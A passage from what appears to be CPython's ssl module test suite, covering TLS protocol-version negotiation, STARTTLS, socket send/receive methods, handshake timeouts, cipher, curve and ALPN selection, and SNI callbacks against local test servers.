client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
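    # recv(0)/read(0) must return b"" immediately, even on a non-blocking
    # socket with no pending data.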
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
        # Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
            # Block in accept() until the client connects, then echo the
            # first 4 bytes back.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # The client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
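    # With disjoint cipher lists the handshake must fail and the server must
    # record a "no shared cipher" error.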
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
        # OpenSSL enables all TLS 1.3 ciphers; enforce TLS 1.2 for this test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
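    # A TLS 1.3 handshake must negotiate one of the TLS 1.3 AEAD cipher suites.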
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
        # Issue #21015: elliptic curve-based Diffie-Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
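    # Compression is either disabled (None) or reported as ZLIB/RLE.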
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
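    # NPN support has been removed; ssl.HAS_NPN must be False.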
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
